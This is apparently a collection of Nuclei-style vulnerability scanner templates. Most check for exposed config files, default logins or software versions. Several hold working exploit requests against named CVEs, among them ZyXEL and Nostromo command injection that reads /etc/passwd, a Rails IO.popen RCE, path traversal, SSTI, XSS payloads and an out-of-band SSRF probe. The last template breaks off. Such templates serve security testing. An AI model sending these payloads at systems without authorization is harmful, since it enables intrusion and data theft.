 3 | info:
 4 |   name: Header Blind SSRF
 5 |   author: geeknik
 6 |   severity: high
 7 |   description: Checks for Blind SSR via popular browser headers.
 8 | 
 9 | requests:
10 |   - payloads:
11 |       header: helpers/payloads/request-headers.txt
12 | 
13 |     raw:
14 |       - |
15 |         GET /?§header§ HTTP/1.1
16 |         Host: {{Hostname}}
17 |         §header§: {{interactsh-url}}
18 |         Connection: close
19 | 
20 |     matchers:
21 |       - type: word
22 |         part: interactsh_protocol
23 |         words:
24 |           - "http"
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/sonarqube-cred.yaml:
--------------------------------------------------------------------------------
 1 | # info to search signature
 2 | id: sonarqube-cred
 3 | info:
 4 |   name: Sonarqube default credentials
 5 |   risk: High
 6 | 
 7 | requests:
 8 |   - method: POST
 9 |     redirect: false
10 |     url: >-
11 |       {{.BaseURL}}/api/authentication/login
12 |     headers:
13 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
14 |       - Content-Type: application/x-www-form-urlencoded
15 |     body: login=admin&password=admin
16 |     detections:
17 |       - >-
18 |         StatusCode() >= 200 && StringSearch("resHeaders", "JWT-SESSION")
19 | 


--------------------------------------------------------------------------------
/nuclei_pocs/google-floc-disabled.yaml:
--------------------------------------------------------------------------------
 1 | id: google-floc-disabled
 2 | 
 3 | info:
 4 |   name: Google FLoC Disabled
 5 |   author: geeknik
 6 |   description: The detected website has decided to explicity exclude itself from Google FLoC tracking.
 7 |   reference: https://www.bleepingcomputer.com/news/security/github-disables-google-floc-user-tracking-on-its-website/
 8 |   severity: info
 9 |   tags: google,floc
10 | 
11 | requests:
12 |   - method: GET
13 |     path:
14 |       - "{{BaseURL}}"
15 | 
16 |     matchers:
17 |       - type: word
18 |         part: header
19 |         words:
20 |           - "interest-cohort=()"
21 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-5398.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-5398
 2 | info:
 3 |   name: Spring MVC RFD
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | requests: 
10 |   - method: GET
11 |     url: >-
12 |       {{.root}}/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
13 |     headers:
14 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
15 |     detections:
16 |       - >-
17 |         StringSearch("resHeaders", '"sample.sh"')
18 | 
19 | references:
20 |   - https://www.cvebase.com/cve/2020/5398
21 | 


--------------------------------------------------------------------------------
/nuclei_pocs/circleci-ssh-config.yaml:
--------------------------------------------------------------------------------
 1 | id: circleci-ssh-config
 2 | 
 3 | info:
 4 |   name: circleci ssh-config exposure
 5 |   author: geeknik
 6 |   severity: low
 7 |   tags: config,exposure
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirects: true
12 |     max-redirects: 3
13 |     path:
14 |       - "{{BaseURL}}/.circleci/ssh-config"
15 | 
16 |     matchers-condition: and
17 |     matchers:
18 |       - type: word
19 |         words:
20 |           - "Host"
21 |           - "HostName"
22 |           - "IdentityFile"
23 |         condition: and
24 | 
25 |       - type: status
26 |         status:
27 |           - 200
28 | 


--------------------------------------------------------------------------------
/nuclei_pocs/detect-rsyncd.yaml:
--------------------------------------------------------------------------------
 1 | id: detect-rsyncd
 2 | 
 3 | info:
 4 |   name: Detect rsyncd
 5 |   reference: https://linux.die.net/man/1/rsync
 6 |   author: geeknik
 7 |   severity: info
 8 |   tags: network,rsyncd
 9 | 
10 | network:
11 |   - inputs:
12 |       - data: "?\r\n"
13 | 
14 |     host:
15 |       - "{{Hostname}}"
16 |       - "{{Hostname}}:873"
17 | 
18 |     matchers:
19 |       - type: word
20 |         words:
21 |           - "RSYNCD: "
22 |           - "ERROR: protocol startup error"
23 |         condition: and
24 |     extractors:
25 |       - type: regex
26 |         regex:
27 |           - 'RSYNCD: \d\d.\d'
28 | 


--------------------------------------------------------------------------------
/nuclei_pocs/vernemq-status.yaml:
--------------------------------------------------------------------------------
 1 | id: vernemq-status
 2 | 
 3 | info:
 4 |   name: VerneMQ Status Check
 5 |   reference:
 6 |     - https://github.com/vernemq/vernemq
 7 |   author: geeknik
 8 |   severity: info
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/status"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: status
18 |         status:
19 |           - 200
20 |       - type: word
21 |         words:
22 |           - "<title>VerneMQ Status"
23 |           - "Issues"
24 |           - "Cluster Overview"
25 |           - "Node Status"
26 |         condition: and
27 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-9054.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-9054
 2 | info:
 3 |   name: ZyXEL NAS RCE
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | requests: 
10 |   - method: GET
11 |     url: >-
12 |       {{.root}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd
13 |     headers:
14 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
15 |     detections:
16 |       - >-
17 |         StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
18 | 
19 | references:
20 |   - https://www.cvebase.com/cve/2020/9054
21 | 


--------------------------------------------------------------------------------
/nuclei_pocs/git-credentials.yaml:
--------------------------------------------------------------------------------
 1 | id: git-credentials
 2 | 
 3 | info:
 4 |   name: Github Authentication Dotfile
 5 |   author: geeknik
 6 |   severity: high
 7 |   tags: github,auth
 8 | 
 9 | requests:
10 |   - method: GET
11 |     path:
12 |       - "{{BaseURL}}/.git-credentials"
13 | 
14 |     matchers-condition: and
15 |     matchers:
16 |       - type: word
17 |         part: header
18 |         words:
19 |           - "text/plain"
20 |       - type: word
21 |         words:
22 |           - "https://"
23 |           - "@github.com"
24 |         condition: and
25 |       - type: status
26 |         status:
27 |           - 200
28 | 


--------------------------------------------------------------------------------
/nuclei_pocs/goliath-detect.yaml:
--------------------------------------------------------------------------------
 1 | id: goliath-detect
 2 | 
 3 | info:
 4 |   name: Detect Goliath
 5 |   author: geeknik
 6 |   description: Goliath is a non-blocking Ruby web server framework -- https://github.com/postrank-labs/goliath
 7 |   severity: info
 8 |   tags: goliath
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 | 
18 |       - type: regex
19 |         part: header
20 |         regex:
21 |           - Goliath+
22 | 
23 |     extractors:
24 |       - type: kval
25 |         part: header
26 |         kval:
27 |           - Server
28 | 


--------------------------------------------------------------------------------
/nuclei_pocs/kubeflow-dashboard-unauth.yaml:
--------------------------------------------------------------------------------
 1 | id: kubeflow-dashboard-unauth
 2 | info:
 3 |   name: Kubeflow Dashboard unauth
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | 
10 | requests:
11 |   - method: GET
12 |     redirect: false
13 |     url: >-
14 |      {{.root}}/pipeline/apis/v1beta1/runs?page_size=5&sort_by=created_at%20desc
15 |     detections:
16 |       - >-
17 |         StatusCode() == 200 && StringSearch("response", "application/json") && StringSearch("body", '{"runs":[{"id":') && StringSearch("body", "resource_references")
18 | 
19 | reference:
20 |   - link: https://github.com/kubeflow/kubeflow


--------------------------------------------------------------------------------
/nuclei_pocs/lucee-detect.yaml:
--------------------------------------------------------------------------------
 1 | id: lucee-detect
 2 | info:
 3 |   name: Detect Lucee
 4 |   author: geeknik
 5 |   description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development -- https://github.com/lucee/Lucee/
 6 |   severity: info
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}"
12 | 
13 |     matchers:
14 | 
15 |       - type: regex
16 |         part: header
17 |         regex:
18 |           - "(?i)X-Lucee-Version"
19 |           - "(?i)X-CB-Server: LUCEE"
20 |           - "(?i)X-IDG-Appserver: Lucee"
21 |         condition: or
22 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-16341.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-16341
 2 | info:
 3 |   name: Nuxeo SSTI
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}//nuxeo/login.jsp/pwn${1199128+7}.xhtml
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && StringSearch("response", "facelet") && StringSearch("response", "1199135")
19 |         
20 | references:
21 |   - https://www.cvebase.com/cve/2018/16341
22 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-19368.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-19368
 2 | info:
 3 |   name: Rumpus FTP XSS
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | 
10 | requests: 
11 |   - method: GET
12 |     url: >-
13 |       {{.root}}//Login?!'><sVg/OnLoAD=alert`1337`//
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && StringSearch("resBody", "value=''><sVg/OnLoAD=alert`1337`//'>") 
19 | references:
20 |   - https://www.cvebase.com/cve/2019/19368
21 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-8163.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-8163
 2 | info:
 3 |   name: Rails RCE
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 | requests: 
11 |   - method: GET
12 |     url: >-
13 |       {{.root}}/?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
19 | 
20 | references:
21 |   - https://www.cvebase.com/cve/2020/8163
22 | 


--------------------------------------------------------------------------------
/nuclei_pocs/php-user-ini.yaml:
--------------------------------------------------------------------------------
 1 | id: php-user-ini
 2 | 
 3 | info:
 4 |   name: PHP .user.ini Disclosure
 5 |   author: geeknik
 6 |   reference: https://www.php.net/manual/en/configuration.file.per-user.php
 7 |   severity: low
 8 |   tags: php
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/.user.ini"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: status
18 |         status:
19 |           - 200
20 |       - type: word
21 |         words:
22 |           - "text/plain"
23 |         part: header
24 | 
25 |       - type: dsl
26 |         dsl:
27 |           - "len(body) > 50"
28 | 


--------------------------------------------------------------------------------
/nuclei_pocs/wordpress-user-enum.yaml:
--------------------------------------------------------------------------------
 1 | id: wordpress-user-enum-01
 2 | info:
 3 |   name: Wordpress REST API user enumeration
 4 |   risk: Low
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - vul: |
11 |       wp-json/wp/v2/users/
12 | 
13 | requests:
14 |   - method: GET
15 |     redirect: false
16 |     url: >-
17 |       {{.root}}/{{.vul}}
18 |     headers:
19 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
20 |     detections:
21 |       - >-
22 |         StatusCode() == 200 && StringSearch("response", "avatar_urls")
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2005-2428.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2005-2428
 2 | info:
 3 |   name: Lotus Domino Sensitive Information Leak
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}/names.nsf/People?OpenView
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && RegexSearch('resBody', '(<a href\=\"/names\.nsf/[0-9a-z\/]+\?OpenDocument)')
19 | 
20 | reference:
21 |   - link: https://www.cvebase.com/cve/2005/2428


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-18264.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-18264
 2 | info:
 3 |   name: Kubernetes Improper Authentication
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | 
10 | variables:
11 |   - endpoints: |
12 |       /api/v1/
13 |       /k8s/api/v1/
14 | requests:
15 |   - method: GET
16 |     redirect: false
17 |     url: >-
18 |      {{.root}}{{.endpoints}}namespaces/kube-system/secrets/kubernetes-dashboard-certs
19 |     detections:
20 |       - >-
21 |         StatusCode() == 200 && StringSearch("response", "apiVersion") && StringSearch("response", "objectRef")
22 | references:
23 |   - https://www.cvebase.com/cve/2018/18264


--------------------------------------------------------------------------------
/nuclei_pocs/circleci-config.yaml:
--------------------------------------------------------------------------------
 1 | id: circleci-config
 2 | 
 3 | info:
 4 |   name: circleci config.yml exposure
 5 |   author: geeknik
 6 |   severity: low
 7 |   reference: https://circleci.com/docs/2.0/sample-config/
 8 |   tags: config,exposure
 9 | 
10 | requests:
11 |   - method: GET
12 |     redirects: true
13 |     max-redirects: 3
14 |     path:
15 |       - "{{BaseURL}}/.circleci/config.yml"
16 | 
17 |     matchers-condition: and
18 |     matchers:
19 |       - type: dsl
20 |         dsl:
21 |           - 'regex("^version: ", body) && contains(body, "jobs:")'
22 | 
23 |       - type: status
24 |         status:
25 |           - 200
26 | 


--------------------------------------------------------------------------------
/nuclei_pocs/django-debug.yaml:
--------------------------------------------------------------------------------
 1 | id: django-debug
 2 | 
 3 | info:
 4 |   name: Django Debug Exposure
 5 |   author: geeknik
 6 |   reference: https://twitter.com/Alra3ees/status/1397660633928286208
 7 |   severity: high
 8 |   tags: django
 9 | 
10 | requests:
11 |   - method: POST
12 |     path:
13 |       - "{{BaseURL}}/admin/login/?next=/admin/"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: status
18 |         status:
19 |           - 500
20 |       - type: word
21 |         part: body
22 |         words:
23 |           - "DB_HOST"
24 |           - "DB_NAME"
25 |           - "DJANGO"
26 |         condition: and
27 | 


--------------------------------------------------------------------------------
/nuclei_pocs/ws-config.yaml:
--------------------------------------------------------------------------------
 1 | id: ws-config
 2 | 
 3 | info:
 4 |   name: Websheets Config
 5 |   author: geeknik
 6 |   reference: https://github.com/daveagp/websheets
 7 |   severity: high
 8 |   tags: websheets,auth
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/ws-config.json"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         part: header
19 |         words:
20 |           - "application/json"
21 |       - type: word
22 |         words:
23 |           - "db-user"
24 |           - "db-password"
25 |       - type: status
26 |         status:
27 |           - 200
28 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-7490.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-7490
 2 | info:
 3 |   name: uWSGI PHP Plugin Path Traversal
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 | requests: 
11 |   - method: GET
12 |     url: >-
13 |       {{.root}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
19 | references:
20 |   - https://www.cvebase.com/cve/2018/7490
21 | 


--------------------------------------------------------------------------------
/nuclei_pocs/magento-config.yaml:
--------------------------------------------------------------------------------
 1 | id: magento-config
 2 | info:
 3 |   name: Magento Config Disclosure
 4 |   author: geeknik
 5 |   severity: medium
 6 |   tags: config,exposure
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/app/etc/local.xml"
12 |       - "{{BaseURL}}/store/app/etc/local.xml"
13 | 
14 |     matchers-condition: and
15 |     matchers:
16 |       - type: status
17 |         status:
18 |           - 200
19 | 
20 |       - type: word
21 |         words:
22 |           - "text/xml"
23 |         part: header
24 | 
25 |       - type: word
26 |         words:
27 |           - "Magento"
28 |         part: body


--------------------------------------------------------------------------------
/nuclei_pocs/nginx-vhost-traffic-status.yaml:
--------------------------------------------------------------------------------
 1 | id: nginx-vhost-traffic-status
 2 | 
 3 | info:
 4 |   name: Nginx Vhost Traffic Status
 5 |   author: geeknik
 6 |   reference: https://github.com/vozlt/nginx-module-vts
 7 |   severity: low
 8 |   tags: status,nginx,misconfig
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/status"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "Nginx Vhost Traffic Status"
20 |           - "Host"
21 |           - "Zone"
22 |         condition: and
23 |       - type: status
24 |         status:
25 |           - 200
26 | 


--------------------------------------------------------------------------------
/nuclei_pocs/content_injection.yaml:
--------------------------------------------------------------------------------
 1 | id: Arbitrary Text Injection
 2 | 
 3 | info:
 4 |   name: Arbitrary Text Injection
 5 |   author: Nikhil Kumar(https://www.linkedin.com/in/nikhil-kumar-4b9443166/)
 6 |   severity: Low
 7 |   tags:  injection
 8 | 
 9 |   
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/!!!ATENTION!!!_This_site_is_on_Maintenance_please_go_to_WWW.EVIL.COM"
14 | 
15 |     matchers:
16 |       - type: word
17 |         words:
18 |           - "!!!ATENTION!!!_This_site_is_on_Maintenance_please_go_to_WWW.EVIL.COM"
19 |         part: body
20 | 
21 | #Hackerone Report
22 | #https://hackerone.com/reports/327671
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/rails-secret-token.yaml:
--------------------------------------------------------------------------------
 1 | id: rails-secret-token
 2 | 
 3 | info:
 4 |   name: Rails Secret Token
 5 |   author: geeknik
 6 |   severity: high
 7 |   tags: config,auth,api
 8 | 
 9 | requests:
10 |   - method: GET
11 |     path:
12 |       - "{{BaseURL}}/config/initializers/secret_token.rb"
13 |       - "{{BaseURL}}/config/secrets.yml"
14 |       - "{{BaseURL}}/.secrets"
15 | 
16 |     matchers-condition: and
17 |     matchers:
18 |       - type: word
19 |         words:
20 |           - "secret_key_base ="
21 |           - "config.secret_token ="
22 |         condition: or
23 |       - type: status
24 |         status:
25 |           - 200
26 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-10220.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-10220
 2 | info:
 3 |   name: rConfig SQLi
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       login.php
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", "rConfig Version 3.9")
21 | 
22 | references:
23 |   - https://www.cvebase.com/cve/2020/10220
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/mrtg-detect.yaml:
--------------------------------------------------------------------------------
 1 | id: mrtg-detect
 2 | info:
 3 |   name: Detect MRTG
 4 |   author: geeknik
 5 |   description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/
 6 |   severity: info
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}"
12 |       - "{{BaseURL}}/mrtg/"
13 |       - "{{BaseURL}}/MRTG/"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: status
18 |         status:
19 |           - 200
20 |       - type: word
21 |         part: body
22 |         words:
23 |           - "MRTG Index Page"
24 |           - "Multi Router Traffic Grapher"
25 |         condition: and
26 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-11450.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-11450
 2 | info:
 3 |   name: MicroStrategy Information Disclosure CVE-2020-11450
 4 |   risk: Potential
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}/MicroStrategyWS/happyaxis.jsp
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && StringSearch("resHeaders", "<title>Axis2 Happiness Page</title>")
19 | 
20 | references:
21 |   - link: https://seclists.org/fulldisclosure/2020/Apr/1


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-27982.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-27982
 2 | info:
 3 |   name: IceWarp WebMail XSS via language parameter (CVE-2020-27982)
 4 |   risk: Low
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | replicate:
10 |   prefixes: 'icewarp'
11 | 
12 | requests:
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/webmail/?language="><img%20src=x%20onerror=alert(1)>
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("body", "IceWarp WebClient") && StringSearch("body", "onerror=alert(1)>")
21 | 
22 | 


--------------------------------------------------------------------------------
/nuclei_pocs/detect-drone.yaml:
--------------------------------------------------------------------------------
 1 | id: detect-drone-config
 2 | 
 3 | info:
 4 |   name: Detect Drone Configuration
 5 |   author: geeknik
 6 |   description: Drone is a Container-Native, Continuous Delivery Platform -- https://github.com/drone/drone
 7 |   severity: high
 8 |   tags: config,exposure,drone
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/.drone.yml"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "kind:"
20 |           - "name:"
21 |           - "steps:"
22 |         condition: and
23 |       - type: status
24 |         status:
25 |           - 200
26 | 


--------------------------------------------------------------------------------
/nuclei_pocs/moodle-auth-xss.yaml:
--------------------------------------------------------------------------------
 1 | id: moodle-auth-xss
 2 | info:
 3 |   name: Moodle Auth XSS
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | replicate:
10 |   prefixes: 'moodle,course'
11 | 
12 | requests:
13 |   - method: GET
14 |     redirect: false
15 |     url: >-
16 |       {{.root}}/mod/lti/auth.php?redirect_uri=javascript:alert('xss')
17 |     headers:
18 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
19 |     detections:
20 |       - >-
21 |         StatusCode() == 200 && StringSearch("response", "document.ltiAuthForm") && StringSearch("response", "javascript:alert('xss')")


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-1653.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-1653
 2 | info:
 3 |   name: Cisco RV320 RV326 Configuration Leak
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       cgi-bin/config.exp
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", "sysconfig")
21 | references:
22 |   - https://www.cvebase.com/cve/2019/1653
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-7246.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-7246
 2 | info:
 3 |   name: qdPM Authenticated RCE
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       /
12 |       /qdPM/
13 | 
14 | requests: 
15 |   - method: GET
16 |     url: >-
17 |       {{.root}}/{{.endpoint}}
18 |     headers:
19 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
20 |     detections:
21 |       - >-
22 |         StatusCode() == 200 && StringSearch("resBody", "qdPM 9.")
23 | 
24 | references:
25 |   - https://www.cvebase.com/cve/2020/7246
26 | 


--------------------------------------------------------------------------------
/nuclei_pocs/cors-00.yaml:
--------------------------------------------------------------------------------
 1 | id: cors-00
 2 | type: fuzz
 3 | info:
 4 |   name: CORS Misconfiguration
 5 |   risk: Medium
 6 | 
 7 | payloads:
 8 |     - 'http://example.com'
 9 |     - 'example.com'
10 | 
11 | requests:
12 |   - generators:
13 |       - Header("{{.payload}}", "Referer")
14 |       - Header("{{.payload}}", "Origin")
15 |     detections:
16 |       - >-
17 |         StringSearch("response","Access-Control-Allow-Origin: {{.payload}}") && StringSearch("response","Access-Control-Allow-Credentials: true")
18 |       - >-
19 |         StringSearch("response","Access-Control-Allow-Origin: *") && StringSearch("response","Access-Control-Allow-Credentials: true")
20 | 


--------------------------------------------------------------------------------
/nuclei_pocs/gogs-install-exposure.yaml:
--------------------------------------------------------------------------------
 1 | id: gogs-install-exposure
 2 | info:
 3 |   name: Gogs install exposure
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}/install
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && StringSearch("body", 'Gogs') && StringSearch("response", 'General Settings') && StringSearch("response", 'Database Settings')
19 | 
20 | references:
21 |   - repo: https://github.com/gogs/gogs
22 | 


--------------------------------------------------------------------------------
/nuclei_pocs/jupyter-ipython-unauth.yaml:
--------------------------------------------------------------------------------
 1 | id: jupyter-ipython-unauth
 2 | info:
 3 |   name: Jupyter ipython Unauth
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}/ipython/tree
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && StringSearch("body", "ipython/static/components") && StringSearch("response", "ipython/kernelspecs")
19 | 
20 | references:
21 |   - poc: "import os;os.popen('cat /etc/passwd').read()"


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-16278.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-16278
 2 | info:
 3 |   name: Nostromo RCE
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | requests: 
10 |   - method: POST
11 |     url: >-
12 |       {{.root}}/.%0d./.%0d./.%0d./.%0d./bin/sh
13 |     headers:
14 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
15 |     body: >-
16 |         echo
17 |         echo
18 |         cat /etc/passwd 2>&1
19 |     detections:
20 |       - >-
21 |         RegexSearch("resBody", "root:[x*]:0:0:")
22 | references:
23 |   - https://www.cvebase.com/cve/2019/16278
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-18394.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-18394
 2 | info:
 3 |   name: OpenFire SSRF
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       getFavicon
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?host=burpcollaborator.net
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
